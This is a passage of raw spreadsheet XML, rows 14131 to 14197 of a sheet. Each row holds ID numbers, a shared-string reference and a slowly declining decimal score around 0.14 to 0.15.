    <row r="14131" ht="15.75" customHeight="1">
      <c r="A14131" s="1">
        <v>7222.0</v>
      </c>
      <c r="B14131" s="2">
        <v>5.0652627E7</v>
      </c>
      <c r="C14131" s="2" t="s">
        <v>13608</v>
      </c>
      <c r="D14131" s="2">
        <v>1.0</v>
      </c>
      <c r="E14131" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14131" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="14132" ht="15.75" customHeight="1">
      <c r="A14132" s="1">
        <v>7271.0</v>
      </c>
      <c r="B14132" s="2">
        <v>5.0784981E7</v>
      </c>
      <c r="C14132" s="2" t="s">
        <v>13609</v>
      </c>
      <c r="D14132" s="2">
        <v>1.0</v>
      </c>
      <c r="E14132" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14132" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="14133" ht="15.75" customHeight="1">
      <c r="A14133" s="1">
        <v>5510.0</v>
      </c>
      <c r="B14133" s="2">
        <v>4.5836528E7</v>
      </c>
      <c r="C14133" s="2" t="s">
        <v>13610</v>
      </c>
      <c r="D14133" s="2">
        <v>1.0</v>
      </c>
      <c r="E14133" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14133" s="2">
        <v>0.1508714596949891</v>
      </c>
    </row>
    <row r="14134" ht="15.75" customHeight="1">
      <c r="A14134" s="1">
        <v>19519.0</v>
      </c>
      <c r="B14134" s="2">
        <v>5.595726E7</v>
      </c>
      <c r="C14134" s="2" t="s">
        <v>13611</v>
      </c>
      <c r="D14134" s="2">
        <v>1.0</v>
      </c>
      <c r="E14134" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14134" s="2">
        <v>0.1506734006734007</v>
      </c>
    </row>
    <row r="14135" ht="15.75" customHeight="1">
      <c r="A14135" s="1">
        <v>14847.0</v>
      </c>
      <c r="B14135" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C14135" s="2" t="s">
        <v>13612</v>
      </c>
      <c r="D14135" s="2">
        <v>1.0</v>
      </c>
      <c r="E14135" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14135" s="2">
        <v>0.1500829187396352</v>
      </c>
    </row>
    <row r="14136" ht="15.75" customHeight="1">
      <c r="A14136" s="1">
        <v>15955.0</v>
      </c>
      <c r="B14136" s="2">
        <v>4.4770538E7</v>
      </c>
      <c r="C14136" s="2" t="s">
        <v>13613</v>
      </c>
      <c r="D14136" s="2">
        <v>1.0</v>
      </c>
      <c r="E14136" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14136" s="2">
        <v>0.15</v>
      </c>
    </row>
    <row r="14137" ht="15.75" customHeight="1">
      <c r="A14137" s="1">
        <v>24527.0</v>
      </c>
      <c r="B14137" s="2">
        <v>1.1178872E7</v>
      </c>
      <c r="C14137" s="2" t="s">
        <v>13614</v>
      </c>
      <c r="D14137" s="2">
        <v>1.0</v>
      </c>
      <c r="E14137" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14137" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="14138" ht="15.75" customHeight="1">
      <c r="A14138" s="1">
        <v>6089.0</v>
      </c>
      <c r="B14138" s="2">
        <v>4.7694156E7</v>
      </c>
      <c r="C14138" s="2" t="s">
        <v>13615</v>
      </c>
      <c r="D14138" s="2">
        <v>1.0</v>
      </c>
      <c r="E14138" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14138" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="14139" ht="15.75" customHeight="1">
      <c r="A14139" s="1">
        <v>1134.0</v>
      </c>
      <c r="B14139" s="2">
        <v>2.4197557E7</v>
      </c>
      <c r="C14139" s="2" t="s">
        <v>13616</v>
      </c>
      <c r="D14139" s="2">
        <v>1.0</v>
      </c>
      <c r="E14139" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14139" s="2">
        <v>0.1484375000000001</v>
      </c>
    </row>
    <row r="14140" ht="15.75" customHeight="1">
      <c r="A14140" s="1">
        <v>7559.0</v>
      </c>
      <c r="B14140" s="2">
        <v>5.1546301E7</v>
      </c>
      <c r="C14140" s="2" t="s">
        <v>13617</v>
      </c>
      <c r="D14140" s="2">
        <v>1.0</v>
      </c>
      <c r="E14140" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14140" s="2">
        <v>0.1484245439469321</v>
      </c>
    </row>
    <row r="14141" ht="15.75" customHeight="1">
      <c r="A14141" s="1">
        <v>27391.0</v>
      </c>
      <c r="B14141" s="2">
        <v>2.1776903E7</v>
      </c>
      <c r="C14141" s="2" t="s">
        <v>13618</v>
      </c>
      <c r="D14141" s="2">
        <v>1.0</v>
      </c>
      <c r="E14141" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14141" s="2">
        <v>0.1478978978978979</v>
      </c>
    </row>
    <row r="14142" ht="15.75" customHeight="1">
      <c r="A14142" s="1">
        <v>446.0</v>
      </c>
      <c r="B14142" s="2">
        <v>1.7131658E7</v>
      </c>
      <c r="C14142" s="2" t="s">
        <v>13619</v>
      </c>
      <c r="D14142" s="2">
        <v>1.0</v>
      </c>
      <c r="E14142" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14142" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="14143" ht="15.75" customHeight="1">
      <c r="A14143" s="1">
        <v>25340.0</v>
      </c>
      <c r="B14143" s="2">
        <v>1.3533275E7</v>
      </c>
      <c r="C14143" s="2" t="s">
        <v>13620</v>
      </c>
      <c r="D14143" s="2">
        <v>1.0</v>
      </c>
      <c r="E14143" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14143" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="14144" ht="15.75" customHeight="1">
      <c r="A14144" s="1">
        <v>12488.0</v>
      </c>
      <c r="B14144" s="2">
        <v>2.9523405E7</v>
      </c>
      <c r="C14144" s="2" t="s">
        <v>13621</v>
      </c>
      <c r="D14144" s="2">
        <v>1.0</v>
      </c>
      <c r="E14144" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14144" s="2">
        <v>0.1474074074074075</v>
      </c>
    </row>
    <row r="14145" ht="15.75" customHeight="1">
      <c r="A14145" s="1">
        <v>30355.0</v>
      </c>
      <c r="B14145" s="2">
        <v>3.8261265E7</v>
      </c>
      <c r="C14145" s="2" t="s">
        <v>13622</v>
      </c>
      <c r="D14145" s="2">
        <v>1.0</v>
      </c>
      <c r="E14145" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14145" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="14146" ht="15.75" customHeight="1">
      <c r="A14146" s="1">
        <v>32252.0</v>
      </c>
      <c r="B14146" s="2">
        <v>5.5086566E7</v>
      </c>
      <c r="C14146" s="2" t="s">
        <v>13623</v>
      </c>
      <c r="D14146" s="2">
        <v>1.0</v>
      </c>
      <c r="E14146" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14146" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="14147" ht="15.75" customHeight="1">
      <c r="A14147" s="1">
        <v>5198.0</v>
      </c>
      <c r="B14147" s="2">
        <v>4.4859051E7</v>
      </c>
      <c r="C14147" s="2" t="s">
        <v>13624</v>
      </c>
      <c r="D14147" s="2">
        <v>1.0</v>
      </c>
      <c r="E14147" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14147" s="2">
        <v>0.1472222222222222</v>
      </c>
    </row>
    <row r="14148" ht="15.75" customHeight="1">
      <c r="A14148" s="1">
        <v>24878.0</v>
      </c>
      <c r="B14148" s="2">
        <v>1.2228573E7</v>
      </c>
      <c r="C14148" s="2" t="s">
        <v>13625</v>
      </c>
      <c r="D14148" s="2">
        <v>1.0</v>
      </c>
      <c r="E14148" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14148" s="2">
        <v>0.147119341563786</v>
      </c>
    </row>
    <row r="14149" ht="15.75" customHeight="1">
      <c r="A14149" s="1">
        <v>13670.0</v>
      </c>
      <c r="B14149" s="2">
        <v>3.6018025E7</v>
      </c>
      <c r="C14149" s="2" t="s">
        <v>13626</v>
      </c>
      <c r="D14149" s="2">
        <v>1.0</v>
      </c>
      <c r="E14149" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14149" s="2">
        <v>0.1467661691542289</v>
      </c>
    </row>
    <row r="14150" ht="15.75" customHeight="1">
      <c r="A14150" s="1">
        <v>16406.0</v>
      </c>
      <c r="B14150" s="2">
        <v>4.6294179E7</v>
      </c>
      <c r="C14150" s="2" t="s">
        <v>13627</v>
      </c>
      <c r="D14150" s="2">
        <v>1.0</v>
      </c>
      <c r="E14150" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14150" s="2">
        <v>0.1467013888888889</v>
      </c>
    </row>
    <row r="14151" ht="15.75" customHeight="1">
      <c r="A14151" s="1">
        <v>5606.0</v>
      </c>
      <c r="B14151" s="2">
        <v>4.6141954E7</v>
      </c>
      <c r="C14151" s="2" t="s">
        <v>13628</v>
      </c>
      <c r="D14151" s="2">
        <v>1.0</v>
      </c>
      <c r="E14151" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14151" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="14152" ht="15.75" customHeight="1">
      <c r="A14152" s="1">
        <v>6401.0</v>
      </c>
      <c r="B14152" s="2">
        <v>4.8485112E7</v>
      </c>
      <c r="C14152" s="2" t="s">
        <v>13629</v>
      </c>
      <c r="D14152" s="2">
        <v>1.0</v>
      </c>
      <c r="E14152" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14152" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="14153" ht="15.75" customHeight="1">
      <c r="A14153" s="1">
        <v>77.0</v>
      </c>
      <c r="B14153" s="2">
        <v>1.1805729E7</v>
      </c>
      <c r="C14153" s="2" t="s">
        <v>13630</v>
      </c>
      <c r="D14153" s="2">
        <v>1.0</v>
      </c>
      <c r="E14153" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14153" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="14154" ht="15.75" customHeight="1">
      <c r="A14154" s="1">
        <v>11266.0</v>
      </c>
      <c r="B14154" s="2">
        <v>2.0689058E7</v>
      </c>
      <c r="C14154" s="2" t="s">
        <v>13631</v>
      </c>
      <c r="D14154" s="2">
        <v>1.0</v>
      </c>
      <c r="E14154" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14154" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="14155" ht="15.75" customHeight="1">
      <c r="A14155" s="1">
        <v>26220.0</v>
      </c>
      <c r="B14155" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C14155" s="2" t="s">
        <v>13632</v>
      </c>
      <c r="D14155" s="2">
        <v>1.0</v>
      </c>
      <c r="E14155" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14155" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="14156" ht="15.75" customHeight="1">
      <c r="A14156" s="1">
        <v>19206.0</v>
      </c>
      <c r="B14156" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C14156" s="2" t="s">
        <v>13633</v>
      </c>
      <c r="D14156" s="2">
        <v>1.0</v>
      </c>
      <c r="E14156" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14156" s="2">
        <v>0.1462418300653595</v>
      </c>
    </row>
    <row r="14157" ht="15.75" customHeight="1">
      <c r="A14157" s="1">
        <v>9016.0</v>
      </c>
      <c r="B14157" s="2">
        <v>5.4992141E7</v>
      </c>
      <c r="C14157" s="2" t="s">
        <v>13634</v>
      </c>
      <c r="D14157" s="2">
        <v>1.0</v>
      </c>
      <c r="E14157" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14157" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="14158" ht="15.75" customHeight="1">
      <c r="A14158" s="1">
        <v>12083.0</v>
      </c>
      <c r="B14158" s="2">
        <v>2.6703931E7</v>
      </c>
      <c r="C14158" s="2" t="s">
        <v>13635</v>
      </c>
      <c r="D14158" s="2">
        <v>1.0</v>
      </c>
      <c r="E14158" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14158" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="14159" ht="15.75" customHeight="1">
      <c r="A14159" s="1">
        <v>29445.0</v>
      </c>
      <c r="B14159" s="2">
        <v>3.222131E7</v>
      </c>
      <c r="C14159" s="2" t="s">
        <v>13636</v>
      </c>
      <c r="D14159" s="2">
        <v>1.0</v>
      </c>
      <c r="E14159" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14159" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="14160" ht="15.75" customHeight="1">
      <c r="A14160" s="1">
        <v>1441.0</v>
      </c>
      <c r="B14160" s="2">
        <v>2.6703585E7</v>
      </c>
      <c r="C14160" s="2" t="s">
        <v>13637</v>
      </c>
      <c r="D14160" s="2">
        <v>1.0</v>
      </c>
      <c r="E14160" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14160" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="14161" ht="15.75" customHeight="1">
      <c r="A14161" s="1">
        <v>5308.0</v>
      </c>
      <c r="B14161" s="2">
        <v>4.5268858E7</v>
      </c>
      <c r="C14161" s="2" t="s">
        <v>13638</v>
      </c>
      <c r="D14161" s="2">
        <v>1.0</v>
      </c>
      <c r="E14161" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14161" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="14162" ht="15.75" customHeight="1">
      <c r="A14162" s="1">
        <v>9533.0</v>
      </c>
      <c r="B14162" s="2">
        <v>5.5985608E7</v>
      </c>
      <c r="C14162" s="2" t="s">
        <v>13639</v>
      </c>
      <c r="D14162" s="2">
        <v>1.0</v>
      </c>
      <c r="E14162" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14162" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="14163" ht="15.75" customHeight="1">
      <c r="A14163" s="1">
        <v>19852.0</v>
      </c>
      <c r="B14163" s="2">
        <v>5.7142761E7</v>
      </c>
      <c r="C14163" s="2" t="s">
        <v>13640</v>
      </c>
      <c r="D14163" s="2">
        <v>1.0</v>
      </c>
      <c r="E14163" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14163" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="14164" ht="15.75" customHeight="1">
      <c r="A14164" s="1">
        <v>25454.0</v>
      </c>
      <c r="B14164" s="2">
        <v>1.3934358E7</v>
      </c>
      <c r="C14164" s="2" t="s">
        <v>13641</v>
      </c>
      <c r="D14164" s="2">
        <v>1.0</v>
      </c>
      <c r="E14164" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14164" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="14165" ht="15.75" customHeight="1">
      <c r="A14165" s="1">
        <v>30331.0</v>
      </c>
      <c r="B14165" s="2">
        <v>3812352.0</v>
      </c>
      <c r="C14165" s="2" t="s">
        <v>13642</v>
      </c>
      <c r="D14165" s="2">
        <v>1.0</v>
      </c>
      <c r="E14165" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14165" s="2">
        <v>0.1457326892109501</v>
      </c>
    </row>
    <row r="14166" ht="15.75" customHeight="1">
      <c r="A14166" s="1">
        <v>7330.0</v>
      </c>
      <c r="B14166" s="2">
        <v>5.0915056E7</v>
      </c>
      <c r="C14166" s="2" t="s">
        <v>13643</v>
      </c>
      <c r="D14166" s="2">
        <v>1.0</v>
      </c>
      <c r="E14166" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14166" s="2">
        <v>0.1453703703703703</v>
      </c>
    </row>
    <row r="14167" ht="15.75" customHeight="1">
      <c r="A14167" s="1">
        <v>19316.0</v>
      </c>
      <c r="B14167" s="2">
        <v>5.529126E7</v>
      </c>
      <c r="C14167" s="2" t="s">
        <v>13644</v>
      </c>
      <c r="D14167" s="2">
        <v>1.0</v>
      </c>
      <c r="E14167" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14167" s="2">
        <v>0.1452380952380953</v>
      </c>
    </row>
    <row r="14168" ht="15.75" customHeight="1">
      <c r="A14168" s="1">
        <v>32746.0</v>
      </c>
      <c r="B14168" s="2">
        <v>6045032.0</v>
      </c>
      <c r="C14168" s="2" t="s">
        <v>13645</v>
      </c>
      <c r="D14168" s="2">
        <v>1.0</v>
      </c>
      <c r="E14168" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14168" s="2">
        <v>0.1452380952380953</v>
      </c>
    </row>
    <row r="14169" ht="15.75" customHeight="1">
      <c r="A14169" s="1">
        <v>3579.0</v>
      </c>
      <c r="B14169" s="2">
        <v>3.8976135E7</v>
      </c>
      <c r="C14169" s="2" t="s">
        <v>13646</v>
      </c>
      <c r="D14169" s="2">
        <v>1.0</v>
      </c>
      <c r="E14169" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14169" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="14170" ht="15.75" customHeight="1">
      <c r="A14170" s="1">
        <v>11727.0</v>
      </c>
      <c r="B14170" s="2">
        <v>2.3917017E7</v>
      </c>
      <c r="C14170" s="2" t="s">
        <v>13647</v>
      </c>
      <c r="D14170" s="2">
        <v>1.0</v>
      </c>
      <c r="E14170" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14170" s="2">
        <v>0.1450617283950617</v>
      </c>
    </row>
    <row r="14171" ht="15.75" customHeight="1">
      <c r="A14171" s="1">
        <v>7573.0</v>
      </c>
      <c r="B14171" s="2">
        <v>5.1575645E7</v>
      </c>
      <c r="C14171" s="2" t="s">
        <v>13648</v>
      </c>
      <c r="D14171" s="2">
        <v>1.0</v>
      </c>
      <c r="E14171" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14171" s="2">
        <v>0.1448087431693989</v>
      </c>
    </row>
    <row r="14172" ht="15.75" customHeight="1">
      <c r="A14172" s="1">
        <v>8967.0</v>
      </c>
      <c r="B14172" s="2">
        <v>5.4940055E7</v>
      </c>
      <c r="C14172" s="2" t="s">
        <v>13649</v>
      </c>
      <c r="D14172" s="2">
        <v>1.0</v>
      </c>
      <c r="E14172" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14172" s="2">
        <v>0.1448087431693989</v>
      </c>
    </row>
    <row r="14173" ht="15.75" customHeight="1">
      <c r="A14173" s="1">
        <v>11922.0</v>
      </c>
      <c r="B14173" s="2">
        <v>2.5330255E7</v>
      </c>
      <c r="C14173" s="2" t="s">
        <v>13650</v>
      </c>
      <c r="D14173" s="2">
        <v>1.0</v>
      </c>
      <c r="E14173" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14173" s="2">
        <v>0.1448087431693989</v>
      </c>
    </row>
    <row r="14174" ht="15.75" customHeight="1">
      <c r="A14174" s="1">
        <v>10048.0</v>
      </c>
      <c r="B14174" s="2">
        <v>5.7106683E7</v>
      </c>
      <c r="C14174" s="2" t="s">
        <v>13651</v>
      </c>
      <c r="D14174" s="2">
        <v>1.0</v>
      </c>
      <c r="E14174" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14174" s="2">
        <v>0.144718792866941</v>
      </c>
    </row>
    <row r="14175" ht="15.75" customHeight="1">
      <c r="A14175" s="1">
        <v>32296.0</v>
      </c>
      <c r="B14175" s="2">
        <v>5552749.0</v>
      </c>
      <c r="C14175" s="2" t="s">
        <v>13652</v>
      </c>
      <c r="D14175" s="2">
        <v>1.0</v>
      </c>
      <c r="E14175" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14175" s="2">
        <v>0.1446360153256706</v>
      </c>
    </row>
    <row r="14176" ht="15.75" customHeight="1">
      <c r="A14176" s="1">
        <v>10087.0</v>
      </c>
      <c r="B14176" s="2">
        <v>5.7170248E7</v>
      </c>
      <c r="C14176" s="2" t="s">
        <v>13653</v>
      </c>
      <c r="D14176" s="2">
        <v>1.0</v>
      </c>
      <c r="E14176" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14176" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="14177" ht="15.75" customHeight="1">
      <c r="A14177" s="1">
        <v>9340.0</v>
      </c>
      <c r="B14177" s="2">
        <v>5.5651697E7</v>
      </c>
      <c r="C14177" s="2" t="s">
        <v>13654</v>
      </c>
      <c r="D14177" s="2">
        <v>1.0</v>
      </c>
      <c r="E14177" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14177" s="2">
        <v>0.1444444444444444</v>
      </c>
    </row>
    <row r="14178" ht="15.75" customHeight="1">
      <c r="A14178" s="1">
        <v>14691.0</v>
      </c>
      <c r="B14178" s="2">
        <v>4.05344E7</v>
      </c>
      <c r="C14178" s="2" t="s">
        <v>13655</v>
      </c>
      <c r="D14178" s="2">
        <v>1.0</v>
      </c>
      <c r="E14178" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14178" s="2">
        <v>0.1442901234567902</v>
      </c>
    </row>
    <row r="14179" ht="15.75" customHeight="1">
      <c r="A14179" s="1">
        <v>2941.0</v>
      </c>
      <c r="B14179" s="2">
        <v>3.596145E7</v>
      </c>
      <c r="C14179" s="2" t="s">
        <v>13656</v>
      </c>
      <c r="D14179" s="2">
        <v>1.0</v>
      </c>
      <c r="E14179" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14179" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="14180" ht="15.75" customHeight="1">
      <c r="A14180" s="1">
        <v>6180.0</v>
      </c>
      <c r="B14180" s="2">
        <v>4.7905769E7</v>
      </c>
      <c r="C14180" s="2" t="s">
        <v>13657</v>
      </c>
      <c r="D14180" s="2">
        <v>1.0</v>
      </c>
      <c r="E14180" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14180" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="14181" ht="15.75" customHeight="1">
      <c r="A14181" s="1">
        <v>8031.0</v>
      </c>
      <c r="B14181" s="2">
        <v>5.2827628E7</v>
      </c>
      <c r="C14181" s="2" t="s">
        <v>13658</v>
      </c>
      <c r="D14181" s="2">
        <v>1.0</v>
      </c>
      <c r="E14181" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14181" s="2">
        <v>0.1442652329749104</v>
      </c>
    </row>
    <row r="14182" ht="15.75" customHeight="1">
      <c r="A14182" s="1">
        <v>30144.0</v>
      </c>
      <c r="B14182" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C14182" s="2" t="s">
        <v>13659</v>
      </c>
      <c r="D14182" s="2">
        <v>1.0</v>
      </c>
      <c r="E14182" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14182" s="2">
        <v>0.1441223832528181</v>
      </c>
    </row>
    <row r="14183" ht="15.75" customHeight="1">
      <c r="A14183" s="1">
        <v>13800.0</v>
      </c>
      <c r="B14183" s="2">
        <v>3.6639536E7</v>
      </c>
      <c r="C14183" s="2" t="s">
        <v>13660</v>
      </c>
      <c r="D14183" s="2">
        <v>1.0</v>
      </c>
      <c r="E14183" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14183" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="14184" ht="15.75" customHeight="1">
      <c r="A14184" s="1">
        <v>12326.0</v>
      </c>
      <c r="B14184" s="2">
        <v>2.8521218E7</v>
      </c>
      <c r="C14184" s="2" t="s">
        <v>13661</v>
      </c>
      <c r="D14184" s="2">
        <v>1.0</v>
      </c>
      <c r="E14184" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14184" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="14185" ht="15.75" customHeight="1">
      <c r="A14185" s="1">
        <v>14781.0</v>
      </c>
      <c r="B14185" s="2">
        <v>4.0902501E7</v>
      </c>
      <c r="C14185" s="2" t="s">
        <v>13662</v>
      </c>
      <c r="D14185" s="2">
        <v>1.0</v>
      </c>
      <c r="E14185" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14185" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="14186" ht="15.75" customHeight="1">
      <c r="A14186" s="1">
        <v>29396.0</v>
      </c>
      <c r="B14186" s="2">
        <v>3.1938111E7</v>
      </c>
      <c r="C14186" s="2" t="s">
        <v>13663</v>
      </c>
      <c r="D14186" s="2">
        <v>1.0</v>
      </c>
      <c r="E14186" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14186" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="14187" ht="15.75" customHeight="1">
      <c r="A14187" s="1">
        <v>647.0</v>
      </c>
      <c r="B14187" s="2">
        <v>1.9875247E7</v>
      </c>
      <c r="C14187" s="2" t="s">
        <v>13664</v>
      </c>
      <c r="D14187" s="2">
        <v>1.0</v>
      </c>
      <c r="E14187" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14187" s="2">
        <v>0.1438356164383562</v>
      </c>
    </row>
    <row r="14188" ht="15.75" customHeight="1">
      <c r="A14188" s="1">
        <v>14193.0</v>
      </c>
      <c r="B14188" s="2">
        <v>3.8179246E7</v>
      </c>
      <c r="C14188" s="2" t="s">
        <v>13665</v>
      </c>
      <c r="D14188" s="2">
        <v>1.0</v>
      </c>
      <c r="E14188" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14188" s="2">
        <v>0.1438356164383562</v>
      </c>
    </row>
    <row r="14189" ht="15.75" customHeight="1">
      <c r="A14189" s="1">
        <v>26042.0</v>
      </c>
      <c r="B14189" s="2">
        <v>1.546335E7</v>
      </c>
      <c r="C14189" s="2" t="s">
        <v>13666</v>
      </c>
      <c r="D14189" s="2">
        <v>1.0</v>
      </c>
      <c r="E14189" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14189" s="2">
        <v>0.1438356164383562</v>
      </c>
    </row>
    <row r="14190" ht="15.75" customHeight="1">
      <c r="A14190" s="1">
        <v>17800.0</v>
      </c>
      <c r="B14190" s="2">
        <v>5.0804029E7</v>
      </c>
      <c r="C14190" s="2" t="s">
        <v>13667</v>
      </c>
      <c r="D14190" s="2">
        <v>1.0</v>
      </c>
      <c r="E14190" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14190" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="14191" ht="15.75" customHeight="1">
      <c r="A14191" s="1">
        <v>15368.0</v>
      </c>
      <c r="B14191" s="2">
        <v>4.2726007E7</v>
      </c>
      <c r="C14191" s="2" t="s">
        <v>13668</v>
      </c>
      <c r="D14191" s="2">
        <v>1.0</v>
      </c>
      <c r="E14191" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14191" s="2">
        <v>0.1436507936507937</v>
      </c>
    </row>
    <row r="14192" ht="15.75" customHeight="1">
      <c r="A14192" s="1">
        <v>17991.0</v>
      </c>
      <c r="B14192" s="2">
        <v>5.1397806E7</v>
      </c>
      <c r="C14192" s="2" t="s">
        <v>13669</v>
      </c>
      <c r="D14192" s="2">
        <v>1.0</v>
      </c>
      <c r="E14192" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14192" s="2">
        <v>0.1436507936507937</v>
      </c>
    </row>
    <row r="14193" ht="15.75" customHeight="1">
      <c r="A14193" s="1">
        <v>11140.0</v>
      </c>
      <c r="B14193" s="2">
        <v>1.9269715E7</v>
      </c>
      <c r="C14193" s="2" t="s">
        <v>13670</v>
      </c>
      <c r="D14193" s="2">
        <v>1.0</v>
      </c>
      <c r="E14193" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14193" s="2">
        <v>0.1435185185185186</v>
      </c>
    </row>
    <row r="14194" ht="15.75" customHeight="1">
      <c r="A14194" s="1">
        <v>1052.0</v>
      </c>
      <c r="B14194" s="2">
        <v>2.3444491E7</v>
      </c>
      <c r="C14194" s="2" t="s">
        <v>13671</v>
      </c>
      <c r="D14194" s="2">
        <v>1.0</v>
      </c>
      <c r="E14194" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14194" s="2">
        <v>0.1434494195688226</v>
      </c>
    </row>
    <row r="14195" ht="15.75" customHeight="1">
      <c r="A14195" s="1">
        <v>9168.0</v>
      </c>
      <c r="B14195" s="2">
        <v>5.532529E7</v>
      </c>
      <c r="C14195" s="2" t="s">
        <v>13672</v>
      </c>
      <c r="D14195" s="2">
        <v>1.0</v>
      </c>
      <c r="E14195" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14195" s="2">
        <v>0.1434494195688226</v>
      </c>
    </row>
    <row r="14196" ht="15.75" customHeight="1">
      <c r="A14196" s="1">
        <v>17858.0</v>
      </c>
      <c r="B14196" s="2">
        <v>5.0984819E7</v>
      </c>
      <c r="C14196" s="2" t="s">
        <v>13673</v>
      </c>
      <c r="D14196" s="2">
        <v>1.0</v>
      </c>
      <c r="E14196" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14196" s="2">
        <v>0.1434494195688226</v>
      </c>
    </row>
    <row r="14197" ht="15.75" customHeight="1">
      <c r="A14197" s="1">
        <v>17216.0</v>
      </c>
      <c r="B14197" s="2">
        <v>4.9055725E7</v>
      </c>
      <c r="C14197" s="2" t="s">
        <v>13674</v>
      </c>
      <c r="D14197" s="2">
        <v>1.0</v>
      </c>
      <c r="E14197" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14197" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
